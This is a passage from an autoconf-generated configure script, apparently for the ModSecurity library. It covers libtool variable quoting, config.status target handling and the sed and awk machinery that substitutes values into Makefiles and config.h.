hardcode_action='`$ECHO "$hardcode_action" | $SED "$delay_single_quote_subst"`' enable_dlopen='`$ECHO "$enable_dlopen" | $SED "$delay_single_quote_subst"`' enable_dlopen_self='`$ECHO "$enable_dlopen_self" | $SED "$delay_single_quote_subst"`' enable_dlopen_self_static='`$ECHO "$enable_dlopen_self_static" | $SED "$delay_single_quote_subst"`' old_striplib='`$ECHO "$old_striplib" | $SED "$delay_single_quote_subst"`' striplib='`$ECHO "$striplib" | $SED "$delay_single_quote_subst"`' compiler_lib_search_dirs='`$ECHO "$compiler_lib_search_dirs" | $SED "$delay_single_quote_subst"`' predep_objects='`$ECHO "$predep_objects" | $SED "$delay_single_quote_subst"`' postdep_objects='`$ECHO "$postdep_objects" | $SED "$delay_single_quote_subst"`' predeps='`$ECHO "$predeps" | $SED "$delay_single_quote_subst"`' postdeps='`$ECHO "$postdeps" | $SED "$delay_single_quote_subst"`' compiler_lib_search_path='`$ECHO "$compiler_lib_search_path" | $SED "$delay_single_quote_subst"`' LD_CXX='`$ECHO "$LD_CXX" | $SED "$delay_single_quote_subst"`' reload_flag_CXX='`$ECHO "$reload_flag_CXX" | $SED "$delay_single_quote_subst"`' reload_cmds_CXX='`$ECHO "$reload_cmds_CXX" | $SED "$delay_single_quote_subst"`' old_archive_cmds_CXX='`$ECHO "$old_archive_cmds_CXX" | $SED "$delay_single_quote_subst"`' compiler_CXX='`$ECHO "$compiler_CXX" | $SED "$delay_single_quote_subst"`' GCC_CXX='`$ECHO "$GCC_CXX" | $SED "$delay_single_quote_subst"`' lt_prog_compiler_no_builtin_flag_CXX='`$ECHO "$lt_prog_compiler_no_builtin_flag_CXX" | $SED "$delay_single_quote_subst"`' lt_prog_compiler_pic_CXX='`$ECHO "$lt_prog_compiler_pic_CXX" | $SED "$delay_single_quote_subst"`' lt_prog_compiler_wl_CXX='`$ECHO "$lt_prog_compiler_wl_CXX" | $SED "$delay_single_quote_subst"`' lt_prog_compiler_static_CXX='`$ECHO "$lt_prog_compiler_static_CXX" | $SED "$delay_single_quote_subst"`' lt_cv_prog_compiler_c_o_CXX='`$ECHO "$lt_cv_prog_compiler_c_o_CXX" | $SED "$delay_single_quote_subst"`' archive_cmds_need_lc_CXX='`$ECHO "$archive_cmds_need_lc_CXX" | $SED "$delay_single_quote_subst"`' enable_shared_with_static_runtimes_CXX='`$ECHO "$enable_shared_with_static_runtimes_CXX" | $SED "$delay_single_quote_subst"`' export_dynamic_flag_spec_CXX='`$ECHO "$export_dynamic_flag_spec_CXX" | $SED "$delay_single_quote_subst"`' whole_archive_flag_spec_CXX='`$ECHO "$whole_archive_flag_spec_CXX" | $SED "$delay_single_quote_subst"`' compiler_needs_object_CXX='`$ECHO "$compiler_needs_object_CXX" | $SED "$delay_single_quote_subst"`' old_archive_from_new_cmds_CXX='`$ECHO "$old_archive_from_new_cmds_CXX" | $SED "$delay_single_quote_subst"`' old_archive_from_expsyms_cmds_CXX='`$ECHO "$old_archive_from_expsyms_cmds_CXX" | $SED "$delay_single_quote_subst"`' archive_cmds_CXX='`$ECHO "$archive_cmds_CXX" | $SED "$delay_single_quote_subst"`' archive_expsym_cmds_CXX='`$ECHO "$archive_expsym_cmds_CXX" | $SED "$delay_single_quote_subst"`' module_cmds_CXX='`$ECHO "$module_cmds_CXX" | $SED "$delay_single_quote_subst"`' module_expsym_cmds_CXX='`$ECHO "$module_expsym_cmds_CXX" | $SED "$delay_single_quote_subst"`' with_gnu_ld_CXX='`$ECHO "$with_gnu_ld_CXX" | $SED "$delay_single_quote_subst"`' allow_undefined_flag_CXX='`$ECHO "$allow_undefined_flag_CXX" | $SED "$delay_single_quote_subst"`' no_undefined_flag_CXX='`$ECHO "$no_undefined_flag_CXX" | $SED "$delay_single_quote_subst"`' hardcode_libdir_flag_spec_CXX='`$ECHO "$hardcode_libdir_flag_spec_CXX" | $SED "$delay_single_quote_subst"`' hardcode_libdir_separator_CXX='`$ECHO "$hardcode_libdir_separator_CXX" | $SED "$delay_single_quote_subst"`' hardcode_direct_CXX='`$ECHO "$hardcode_direct_CXX" | $SED "$delay_single_quote_subst"`' hardcode_direct_absolute_CXX='`$ECHO "$hardcode_direct_absolute_CXX" | $SED "$delay_single_quote_subst"`' hardcode_minus_L_CXX='`$ECHO "$hardcode_minus_L_CXX" | $SED "$delay_single_quote_subst"`' hardcode_shlibpath_var_CXX='`$ECHO "$hardcode_shlibpath_var_CXX" | $SED "$delay_single_quote_subst"`' hardcode_automatic_CXX='`$ECHO "$hardcode_automatic_CXX" | $SED "$delay_single_quote_subst"`' inherit_rpath_CXX='`$ECHO "$inherit_rpath_CXX" | $SED "$delay_single_quote_subst"`' link_all_deplibs_CXX='`$ECHO "$link_all_deplibs_CXX" | $SED "$delay_single_quote_subst"`' always_export_symbols_CXX='`$ECHO "$always_export_symbols_CXX" | $SED "$delay_single_quote_subst"`' export_symbols_cmds_CXX='`$ECHO "$export_symbols_cmds_CXX" | $SED "$delay_single_quote_subst"`' exclude_expsyms_CXX='`$ECHO "$exclude_expsyms_CXX" | $SED "$delay_single_quote_subst"`' include_expsyms_CXX='`$ECHO "$include_expsyms_CXX" | $SED "$delay_single_quote_subst"`' prelink_cmds_CXX='`$ECHO "$prelink_cmds_CXX" | $SED "$delay_single_quote_subst"`' postlink_cmds_CXX='`$ECHO "$postlink_cmds_CXX" | $SED "$delay_single_quote_subst"`' file_list_spec_CXX='`$ECHO "$file_list_spec_CXX" | $SED "$delay_single_quote_subst"`' hardcode_action_CXX='`$ECHO "$hardcode_action_CXX" | $SED "$delay_single_quote_subst"`' compiler_lib_search_dirs_CXX='`$ECHO "$compiler_lib_search_dirs_CXX" | $SED "$delay_single_quote_subst"`' predep_objects_CXX='`$ECHO "$predep_objects_CXX" | $SED "$delay_single_quote_subst"`' postdep_objects_CXX='`$ECHO "$postdep_objects_CXX" | $SED "$delay_single_quote_subst"`' predeps_CXX='`$ECHO "$predeps_CXX" | $SED "$delay_single_quote_subst"`' postdeps_CXX='`$ECHO "$postdeps_CXX" | $SED "$delay_single_quote_subst"`' compiler_lib_search_path_CXX='`$ECHO "$compiler_lib_search_path_CXX" | $SED "$delay_single_quote_subst"`' LTCC='$LTCC' LTCFLAGS='$LTCFLAGS' compiler='$compiler_DEFAULT' # A function that is used when there is no print builtin or printf. func_fallback_echo () { eval 'cat <<_LTECHO_EOF \$1 _LTECHO_EOF' } # Quote evaled strings. for var in SHELL \ ECHO \ PATH_SEPARATOR \ SED \ GREP \ EGREP \ FGREP \ LD \ NM \ LN_S \ lt_SP2NL \ lt_NL2SP \ reload_flag \ OBJDUMP \ deplibs_check_method \ file_magic_cmd \ file_magic_glob \ want_nocaseglob \ DLLTOOL \ sharedlib_from_linklib_cmd \ AR \ archiver_list_spec \ STRIP \ RANLIB \ CC \ CFLAGS \ compiler \ lt_cv_sys_global_symbol_pipe \ lt_cv_sys_global_symbol_to_cdecl \ lt_cv_sys_global_symbol_to_import \ lt_cv_sys_global_symbol_to_c_name_address \ lt_cv_sys_global_symbol_to_c_name_address_lib_prefix \ lt_cv_nm_interface \ nm_file_list_spec \ lt_cv_truncate_bin \ lt_prog_compiler_no_builtin_flag \ lt_prog_compiler_pic \ lt_prog_compiler_wl \ lt_prog_compiler_static \ lt_cv_prog_compiler_c_o \ need_locks \ MANIFEST_TOOL \ DSYMUTIL \ NMEDIT \ LIPO \ OTOOL \ OTOOL64 \ shrext_cmds \ export_dynamic_flag_spec \ whole_archive_flag_spec \ compiler_needs_object \ with_gnu_ld \ allow_undefined_flag \ no_undefined_flag \ hardcode_libdir_flag_spec \ hardcode_libdir_separator \ exclude_expsyms \ include_expsyms \ file_list_spec \ variables_saved_for_relink \ libname_spec \ library_names_spec \ soname_spec \ install_override_mode \ finish_eval \ old_striplib \ striplib \ compiler_lib_search_dirs \ predep_objects \ postdep_objects \ predeps \ postdeps \ compiler_lib_search_path \ LD_CXX \ reload_flag_CXX \ compiler_CXX \ lt_prog_compiler_no_builtin_flag_CXX \ lt_prog_compiler_pic_CXX \ lt_prog_compiler_wl_CXX \ lt_prog_compiler_static_CXX \ lt_cv_prog_compiler_c_o_CXX \ export_dynamic_flag_spec_CXX \ whole_archive_flag_spec_CXX \ compiler_needs_object_CXX \ with_gnu_ld_CXX \ allow_undefined_flag_CXX \ no_undefined_flag_CXX \ hardcode_libdir_flag_spec_CXX \ hardcode_libdir_separator_CXX \ exclude_expsyms_CXX \ include_expsyms_CXX \ file_list_spec_CXX \ compiler_lib_search_dirs_CXX \ predep_objects_CXX \ postdep_objects_CXX \ predeps_CXX \ postdeps_CXX \ compiler_lib_search_path_CXX; do case \`eval \\\\\$ECHO \\\\""\\\\\$\$var"\\\\"\` in *[\\\\\\\`\\"\\\$]*) eval "lt_\$var=\\\\\\"\\\`\\\$ECHO \\"\\\$\$var\\" | \\\$SED \\"\\\$sed_quote_subst\\"\\\`\\\\\\"" ## exclude from sc_prohibit_nested_quotes ;; *) eval "lt_\$var=\\\\\\"\\\$\$var\\\\\\"" ;; esac done # Double-quote double-evaled strings. for var in reload_cmds \ old_postinstall_cmds \ old_postuninstall_cmds \ old_archive_cmds \ extract_expsyms_cmds \ old_archive_from_new_cmds \ old_archive_from_expsyms_cmds \ archive_cmds \ archive_expsym_cmds \ module_cmds \ module_expsym_cmds \ export_symbols_cmds \ prelink_cmds \ postlink_cmds \ postinstall_cmds \ postuninstall_cmds \ finish_cmds \ sys_lib_search_path_spec \ configure_time_dlsearch_path \ configure_time_lt_sys_library_path \ reload_cmds_CXX \ old_archive_cmds_CXX \ old_archive_from_new_cmds_CXX \ old_archive_from_expsyms_cmds_CXX \ archive_cmds_CXX \ archive_expsym_cmds_CXX \ module_cmds_CXX \ module_expsym_cmds_CXX \ export_symbols_cmds_CXX \ prelink_cmds_CXX \ postlink_cmds_CXX; do case \`eval \\\\\$ECHO \\\\""\\\\\$\$var"\\\\"\` in *[\\\\\\\`\\"\\\$]*) eval "lt_\$var=\\\\\\"\\\`\\\$ECHO \\"\\\$\$var\\" | \\\$SED -e \\"\\\$double_quote_subst\\" -e \\"\\\$sed_quote_subst\\" -e \\"\\\$delay_variable_subst\\"\\\`\\\\\\"" ## exclude from sc_prohibit_nested_quotes ;; *) eval "lt_\$var=\\\\\\"\\\$\$var\\\\\\"" ;; esac done ac_aux_dir='$ac_aux_dir' # See if we are running on zsh, and set the options that allow our # commands through without removal of \ escapes INIT. if test -n "\${ZSH_VERSION+set}"; then setopt NO_GLOB_SUBST fi PACKAGE='$PACKAGE' VERSION='$VERSION' RM='$RM' ofile='$ofile' _ACEOF cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 # Handling of arguments. for ac_config_target in $ac_config_targets do case $ac_config_target in "depfiles") CONFIG_COMMANDS="$CONFIG_COMMANDS depfiles" ;; "libtool") CONFIG_COMMANDS="$CONFIG_COMMANDS libtool" ;; "modsecurity.pc") CONFIG_FILES="$CONFIG_FILES modsecurity.pc" ;; "Makefile") CONFIG_FILES="$CONFIG_FILES Makefile" ;; "doc/Makefile") CONFIG_FILES="$CONFIG_FILES doc/Makefile" ;; "src/Makefile") CONFIG_FILES="$CONFIG_FILES src/Makefile" ;; "others/Makefile") CONFIG_FILES="$CONFIG_FILES others/Makefile" ;; "tools/Makefile") CONFIG_FILES="$CONFIG_FILES tools/Makefile" ;; "tools/rules-check/Makefile") CONFIG_FILES="$CONFIG_FILES tools/rules-check/Makefile" ;; "test/Makefile") CONFIG_FILES="$CONFIG_FILES test/Makefile" ;; "test/benchmark/Makefile") CONFIG_FILES="$CONFIG_FILES test/benchmark/Makefile" ;; "examples/Makefile") CONFIG_FILES="$CONFIG_FILES examples/Makefile" ;; "examples/simple_example_using_c/Makefile") CONFIG_FILES="$CONFIG_FILES examples/simple_example_using_c/Makefile" ;; "examples/multiprocess_c/Makefile") CONFIG_FILES="$CONFIG_FILES examples/multiprocess_c/Makefile" ;; "examples/reading_logs_with_offset/Makefile") CONFIG_FILES="$CONFIG_FILES examples/reading_logs_with_offset/Makefile" ;; "examples/reading_logs_via_rule_message/Makefile") CONFIG_FILES="$CONFIG_FILES examples/reading_logs_via_rule_message/Makefile" ;; "examples/using_bodies_in_chunks/Makefile") CONFIG_FILES="$CONFIG_FILES examples/using_bodies_in_chunks/Makefile" ;; "test/fuzzer/Makefile") CONFIG_FILES="$CONFIG_FILES test/fuzzer/Makefile" ;; "src/parser/Makefile") CONFIG_FILES="$CONFIG_FILES src/parser/Makefile" ;; "src/config.h") CONFIG_HEADERS="$CONFIG_HEADERS src/config.h" ;; *) as_fn_error $? "invalid argument: \`$ac_config_target'" "$LINENO" 5;; esac done # If the user did not use the arguments to specify the items to instantiate, # then the envvar interface is used. Set only those that are not. # We use the long form for the default assignment because of an extremely # bizarre bug on SunOS 4.1.3. if $ac_need_defaults; then test "${CONFIG_FILES+set}" = set || CONFIG_FILES=$config_files test "${CONFIG_HEADERS+set}" = set || CONFIG_HEADERS=$config_headers test "${CONFIG_COMMANDS+set}" = set || CONFIG_COMMANDS=$config_commands fi # Have a temporary directory for convenience. Make it in the build tree # simply because there is no reason against having it here, and in addition, # creating and moving files from /tmp can sometimes cause problems. # Hook for its removal unless debugging. # Note that there is a small window in which the directory will not be cleaned: # after its creation but before its name has been assigned to `$tmp'. $debug || { tmp= ac_tmp= trap 'exit_status=$? : "${ac_tmp:=$tmp}" { test ! -d "$ac_tmp" || rm -fr "$ac_tmp"; } && exit $exit_status ' 0 trap 'as_fn_exit 1' 1 2 13 15 } # Create a (secure) tmp directory for tmp files. { tmp=`(umask 077 && mktemp -d "./confXXXXXX") 2>/dev/null` && test -d "$tmp" } || { tmp=./conf$$-$RANDOM (umask 077 && mkdir "$tmp") } || as_fn_error $? "cannot create a temporary directory in ." "$LINENO" 5 ac_tmp=$tmp # Set up the scripts for CONFIG_FILES section. # No need to generate them if there are no CONFIG_FILES. # This happens for instance with `./config.status config.h'. if test -n "$CONFIG_FILES"; then ac_cr=`echo X | tr X '\015'` # On cygwin, bash can eat \r inside `` if the user requested igncr. # But we know of no other shell where ac_cr would be empty at this # point, so we can use a bashism as a fallback. if test "x$ac_cr" = x; then eval ac_cr=\$\'\\r\' fi ac_cs_awk_cr=`$AWK 'BEGIN { print "a\rb" }' /dev/null` if test "$ac_cs_awk_cr" = "a${ac_cr}b"; then ac_cs_awk_cr='\\r' else ac_cs_awk_cr=$ac_cr fi echo 'BEGIN {' >"$ac_tmp/subs1.awk" && _ACEOF { echo "cat >conf$$subs.awk <<_ACEOF" && echo "$ac_subst_vars" | sed 's/.*/&!$&$ac_delim/' && echo "_ACEOF" } >conf$$subs.sh || as_fn_error $? "could not make $CONFIG_STATUS" "$LINENO" 5 ac_delim_num=`echo "$ac_subst_vars" | grep -c '^'` ac_delim='%!_!# ' for ac_last_try in false false false false false :; do . ./conf$$subs.sh || as_fn_error $? "could not make $CONFIG_STATUS" "$LINENO" 5 ac_delim_n=`sed -n "s/.*$ac_delim\$/X/p" conf$$subs.awk | grep -c X` if test $ac_delim_n = $ac_delim_num; then break elif $ac_last_try; then as_fn_error $? "could not make $CONFIG_STATUS" "$LINENO" 5 else ac_delim="$ac_delim!$ac_delim _$ac_delim!! " fi done rm -f conf$$subs.sh cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 cat >>"\$ac_tmp/subs1.awk" <<\\_ACAWK && _ACEOF sed -n ' h s/^/S["/; s/!.*/"]=/ p g s/^[^!]*!// :repl t repl s/'"$ac_delim"'$// t delim :nl h s/\(.\{148\}\)..*/\1/ t more1 s/["\\]/\\&/g; s/^/"/; s/$/\\n"\\/ p n b repl :more1 s/["\\]/\\&/g; s/^/"/; s/$/"\\/ p g s/.\{148\}// t nl :delim h s/\(.\{148\}\)..*/\1/ t more2 s/["\\]/\\&/g; s/^/"/; s/$/"/ p b :more2 s/["\\]/\\&/g; s/^/"/; s/$/"\\/ p g s/.\{148\}// t delim ' >$CONFIG_STATUS || ac_write_fail=1 rm -f conf$$subs.awk cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 _ACAWK cat >>"\$ac_tmp/subs1.awk" <<_ACAWK && for (key in S) S_is_set[key] = 1 FS = "" } { line = $ 0 nfields = split(line, field, "@") substed = 0 len = length(field[1]) for (i = 2; i < nfields; i++) { key = field[i] keylen = length(key) if (S_is_set[key]) { value = S[key] line = substr(line, 1, len) "" value "" substr(line, len + keylen + 3) len += length(value) + length(field[++i]) substed = 1 } else len += 1 + keylen } print line } _ACAWK _ACEOF cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 if sed "s/$ac_cr//" < /dev/null > /dev/null 2>&1; then sed "s/$ac_cr\$//; s/$ac_cr/$ac_cs_awk_cr/g" else cat fi < "$ac_tmp/subs1.awk" > "$ac_tmp/subs.awk" \ || as_fn_error $? "could not setup config files machinery" "$LINENO" 5 _ACEOF # VPATH may cause trouble with some makes, so we remove sole $(srcdir), # ${srcdir} and @srcdir@ entries from VPATH if srcdir is ".", strip leading and # trailing colons and then remove the whole line if VPATH becomes empty # (actually we leave an empty line to preserve line numbers). if test "x$srcdir" = x.; then ac_vpsub='/^[ ]*VPATH[ ]*=[ ]*/{ h s/// s/^/:/ s/[ ]*$/:/ s/:\$(srcdir):/:/g s/:\${srcdir}:/:/g s/:@srcdir@:/:/g s/^:*// s/:*$// x s/\(=[ ]*\).*/\1/ G s/\n// s/^[^=]*=[ ]*$// }' fi cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 fi # test -n "$CONFIG_FILES" # Set up the scripts for CONFIG_HEADERS section. # No need to generate them if there are no CONFIG_HEADERS. # This happens for instance with `./config.status Makefile'. if test -n "$CONFIG_HEADERS"; then cat >"$ac_tmp/defines.awk" <<\_ACAWK || BEGIN { _ACEOF # Transform confdefs.h into an awk script `defines.awk', embedded as # here-document in config.status, that substitutes the proper values into # config.h.in to produce config.h. # Create a delimiter string that does not exist in confdefs.h, to ease # handling of long lines. ac_delim='%!_!# ' for ac_last_try in false false :; do ac_tt=`sed -n "/$ac_delim/p" confdefs.h` if test -z "$ac_tt"; then break elif $ac_last_try; then as_fn_error $? "could not make $CONFIG_HEADERS" "$LINENO" 5 else ac_delim="$ac_delim!$ac_delim _$ac_delim!! " fi done # For the awk script, D is an array of macro values keyed by name, # likewise P contains macro parameters if any. Preserve backslash # newline sequences. ac_word_re=[_$as_cr_Letters][_$as_cr_alnum]* sed -n ' s/.\{148\}/&'"$ac_delim"'/g t rset :rset s/^[ ]*#[ ]*define[ ][ ]*/ / t def d :def s/\\$// t bsnl s/["\\]/\\&/g s/^ \('"$ac_word_re"'\)\(([^()]*)\)[ ]*\(.*\)/P["\1"]="\2"\ D["\1"]=" \3"/p s/^ \('"$ac_word_re"'\)[ ]*\(.*\)/D["\1"]=" \2"/p d :bsnl s/["\\]/\\&/g s/^ \('"$ac_word_re"'\)\(([^()]*)\)[ ]*\(.*\)/P["\1"]="\2"\ D["\1"]=" \3\\\\\\n"\\/p t cont s/^ \('"$ac_word_re"'\)[ ]*\(.*\)/D["\1"]=" \2\\\\\\n"\\/p t cont d :cont n s/.\{148\}/&'"$ac_delim"'/g t clear :clear s/\\$// t bsnlc s/["\\]/\\&/g; s/^/"/; s/$/"/p d :bsnlc s/["\\]/\\&/g; s/^/"/; s/$/\\\\\\n"\\/p b cont ' >$CONFIG_STATUS || ac_write_fail=1 cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 for (key in D) D_is_set[key] = 1 FS = "" } /^[\t ]*#[\t ]*(define|undef)[\t ]+$ac_word_re([\t (]|\$)/ { line = \$ 0 split(line, arg, " ") if (arg[1] == "#") { defundef = arg[2] mac1 = arg[3] } else { defundef = substr(arg[1], 2) mac1 = arg[2] } split(mac1, mac2, "(") #) macro = mac2[1] prefix = substr(line, 1, index(line, defundef) - 1) if (D_is_set[macro]) { # Preserve the white space surrounding the "#". print prefix "define", macro P[macro] D[macro] next } else { # Replace #undef with comments. This is necessary, for example, # in the case of _POSIX_SOURCE, which is predefined and required # on some systems where configure will not decide to define it. if (defundef == "undef") { print "/*", prefix defundef, macro, "*/" next } } } { print } _ACAWK _ACEOF cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 as_fn_error $? "could not setup config headers machinery" "$LINENO" 5 fi # test -n "$CONFIG_HEADERS" eval set X " :F $CONFIG_FILES :H $CONFIG_HEADERS :C $CONFIG_COMMANDS" shift for ac_tag do case $ac_tag in :[FHLC]) ac_mode=$ac_tag; continue;; esac case $ac_mode$ac_tag in :[FHL]*:*);; :L* | :C*:*) as_fn_error $? "invalid tag \`$ac_tag'" "$LINENO" 5;; :[FH]-) ac_tag=-:-;; :[FH]*) ac_tag=$ac_tag:$ac_tag.in;; esac ac_save_IFS=$IFS IFS=: set x $ac_tag IFS=$ac_save_IFS shift ac_file=$1 shift case $ac_mode in :L) ac_source=$1;; :[FH]) ac_file_inputs= for ac_f do case $ac_f in -) ac_f="$ac_tmp/stdin";; *) # Look for the file first in the build tree, then in the source tree # (if the path is not absolute). The absolute path cannot be DOS-style, # because $ac_f cannot contain `:'. test -f "$ac_f" || case $ac_f in [\\/$]*) false;; *) test -f "$srcdir/$ac_f" && ac_f="$srcdir/$ac_f";; esac || as_fn_error 1 "cannot find input file: \`$ac_f'" "$LINENO" 5;; esac case $ac_f in *\'*) ac_f=`$as_echo "$ac_f" | sed "s/'/'\\\\\\\\''/g"`;; esac as_fn_append ac_file_inputs " '$ac_f'" done # Let's still pretend it is `configure' which instantiates (i.e., don't # use $as_me), people would be surprised to read: # /* config.h. Generated by config.status. */ configure_input='Generated from '` $as_echo "$*" | sed 's|^[^:]*/||;s|:[^:]*/|, |g' `' by configure.' if test x"$ac_file" != x-; then configure_input="$ac_file. $configure_input" { $as_echo "$as_me:${as_lineno-$LINENO}: creating $ac_file" >&5 $as_echo "$as_me: creating $ac_file" >&6;} fi # Neutralize special characters interpreted by sed in replacement strings. case $configure_input in #( *\&* | *\|* | *\\* ) ac_sed_conf_input=`$as_echo "$configure_input" | sed 's/[\\\\&|]/\\\\&/g'`;; #( *) ac_sed_conf_input=$configure_input;; esac case $ac_tag in *:-:* | *:-) cat >"$ac_tmp/stdin" \ || as_fn_error $? "could not create $ac_file" "$LINENO" 5 ;; esac ;; esac ac_dir=`$as_dirname -- "$ac_file" || $as_expr X"$ac_file" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ X"$ac_file" : 'X\(//\)[^/]' \| \ X"$ac_file" : 'X\(//\)$' \| \ X"$ac_file" : 'X\(/\)' \| . 2>/dev/null || $as_echo X"$ac_file" | sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/ q } /^X\(\/\/\)[^/].*/{ s//\1/ q } /^X\(\/\/\)$/{ s//\1/ q } /^X\(\/\).*/{ s//\1/ q } s/.*/./; q'` as_dir="$ac_dir"; as_fn_mkdir_p ac_builddir=. case "$ac_dir" in .) ac_dir_suffix= ac_top_builddir_sub=. ac_top_build_prefix= ;; *) ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'` # A ".." for each directory in $ac_dir_suffix. ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'` case $ac_top_builddir_sub in "") ac_top_builddir_sub=. ac_top_build_prefix= ;; *) ac_top_build_prefix=$ac_top_builddir_sub/ ;; esac ;; esac ac_abs_top_builddir=$ac_pwd ac_abs_builddir=$ac_pwd$ac_dir_suffix # for backward compatibility: ac_top_builddir=$ac_top_build_prefix case $srcdir in .) # We are building in place. ac_srcdir=. ac_top_srcdir=$ac_top_builddir_sub ac_abs_top_srcdir=$ac_pwd ;; [\\/]* | ?:[\\/]* ) # Absolute name. ac_srcdir=$srcdir$ac_dir_suffix; ac_top_srcdir=$srcdir ac_abs_top_srcdir=$srcdir ;; *) # Relative name. ac_srcdir=$ac_top_build_prefix$srcdir$ac_dir_suffix ac_top_srcdir=$ac_top_build_prefix$srcdir ac_abs_top_srcdir=$ac_pwd/$srcdir ;; esac ac_abs_srcdir=$ac_abs_top_srcdir$ac_dir_suffix case $ac_mode in :F) # # CONFIG_FILE # case $INSTALL in [\\/$]* | ?:[\\/]* ) ac_INSTALL=$INSTALL ;; *) ac_INSTALL=$ac_top_build_prefix$INSTALL ;; esac ac_MKDIR_P=$MKDIR_P case $MKDIR_P in [\\/$]* | ?:[\\/]* ) ;; */*) ac_MKDIR_P=$ac_top_build_prefix$MKDIR_P ;; esac _ACEOF cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 # If the template does not know about datarootdir, expand it. # FIXME: This hack should be removed a few years after 2.60. ac_datarootdir_hack=; ac_datarootdir_seen= ac_sed_dataroot=' /datarootdir/ { p q } /@datadir@/p /@docdir@/p /@infodir@/p /@localedir@/p /@mandir@/p' case `eval "sed -n \"\$ac_sed_dataroot\" $ac_file_inputs"` in *datarootdir*) ac_datarootdir_seen=yes;; *@datadir@*|*@docdir@*|*@infodir@*|*@localedir@*|*@mandir@*) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $ac_file_inputs seems to ignore the --datarootdir setting" >&5 $as_echo "$as_me: WARNING: $ac_file_inputs seems to ignore the --datarootdir setting" >&2;} _ACEOF cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 ac_datarootdir_hack=' s&@datadir@&$datadir&g s&@docdir@&$docdir&g s&@infodir@&$infodir&g s&@localedir@&$localedir&g s&@mandir@&$mandir&g s&\\\${datarootdir}&$datarootdir&g' ;; esac _ACEOF # Neutralize VPATH when `$srcdir' = `.'. # Shell code in configure.ac might set extrasub. # FIXME: do we really want to maintain this feature? cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 ac_sed_extra="$ac_vpsub $extrasub _ACEOF cat >>$CONFIG_STATUS <<\_ACEOF || ac_write_fail=1 :t /@[a-zA-Z_][a-zA-Z_0-9]*@/!b s|@configure_input@|$ac_sed_conf_input|;t t s&@top_builddir@&$ac_top_builddir_sub&;t t s&@top_build_prefix@&$ac_top_build_prefix&;t t s&@srcdir@&$ac_srcdir&;t t s&@abs_srcdir@&$ac_abs_srcdir&;t t s&@top_srcdir@&$ac_top_srcdir&;t t s&@abs_top_srcdir@&$ac_abs_top_srcdir&;t t s&@builddir@&$ac_builddir&;t t s&@abs_builddir@&$ac_abs_builddir&;t t s&@abs_top_builddir@&$ac_abs_top_builddir&;t t s&@INSTALL@&$ac_INSTALL&;t t s&@MKDIR_P@&$ac_MKDIR_P&;t t $ac_datarootdir_hack " eval sed \"\$ac_sed_extra\" "$ac_file_inputs" | $AWK -f "$ac_tmp/subs.awk" \ >$ac_tmp/out || as_fn_error $? "could not create $ac_file" "$LINENO" 5 test -z "$ac_datarootdir_hack$ac_datarootdir_seen" && { ac_out=`sed -n '/\${datarootdir}/p' "$ac_tmp/out"`; test -n "$ac_out"; } && { ac_out=`sed -n '/^[ ]*datarootdir[ ]*:*=/p' \ "$ac_tmp/out"`; test -z "$ac_out"; } && { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $ac_file contains a reference to the variable \`datarootdir' which seems to be undefined. Please make sure it is defined" >&5 $as_echo "$as_me: WARNING: $ac_file contains a reference to the variable \`datarootdir' which seems to be undefined. Please make sure it is defined" >&2;} rm -f "$ac_tmp/stdin" case $ac_file in -) cat "$ac_tmp/out" && rm -f "$ac_tmp/out";; *) rm -f "$ac_file" && mv "$ac_tmp/out" "$ac_file";; esac \ || as_fn_error $? "could not create $ac_file" "$LINENO" 5 ;; :H) # # CONFIG_HEADER # if test x"$ac_file" != x-; then { $as_echo "/* $configure_input */" \ && eval '$AWK -f "$ac_tmp/defines.awk"' "$ac_file_inputs" } >"$ac_tmp/config.h" \ || as_fn_error $? "could not create $ac_file" "$LINENO" 5 if diff "$ac_file" "$ac_tmp/config.h" >/dev/null 2>&1; then { $as_echo "$as_me:${as_lineno-$LINENO}: $ac_file is unchanged" >&5 $as_echo "$as_me: $ac_file is unchanged" >&6;} else rm -f "$ac_file" mv "$ac_tmp/config.h" "$ac_file" \ || as_fn_error $? "could not create $ac_file" "$LINENO" 5 fi else $as_echo "/* $configure_input */" \ && eval '$AWK -f "$ac_tmp/defines.awk"' "$ac_file_inputs" \ || as_fn_error $? "could not create -" "$LINENO" 5 fi # Compute "$ac_file"'s index in $config_headers. _am_arg="$ac_file" _am_stamp_count=1 for _am_header in $config_headers :; do case $_am_header in $_am_arg | $_am_arg:* ) break ;; * ) _am_stamp_count=`expr $_am_stamp_count + 1` ;; esac done echo "timestamp for $_am_arg" >`$as_dirname -- "$_am_arg" || $as_expr X"$_am_arg" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ X"$_am_arg" : 'X\(//\)[^/]' \| \ X"$_am_arg" : 'X\(//\)$' \| \ X"$_am_arg" : 'X\(/\)' \| . 2>/dev/null || $as_echo X"$_am_arg" | sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/ q } /^X\(\/\/\)[^/].*/{ s//\1/ q } /^X\(\/\/\)$/{ s//\1/ q } /^X\(\/\).*/{ s//\1/ q } s/.*/./; q'`/stamp-h$_am_stamp_count ;; :C) { $as_echo "$as_me:${as_lineno-$LINENO}: executing $ac_file commands" >&5 $as_echo "$as_me: executing $ac_file commands" >&6;} ;; esac case $ac_file$ac_mode in "depfiles":C) test x"$AMDEP_TRUE" != x"" || { # Older Autoconf quotes --file arguments for eval, but not when files # are listed without --file. Let's play safe and only enable the eval # if we detect the quoting. # TODO: see whether this extra hack can be removed once we start # requiring Autoconf 2.70 or later. case $CONFIG_FILES in #( *\'*) : eval set x "$CONFIG_FILES" ;; #( *) : set x $CONFIG_FILES ;; 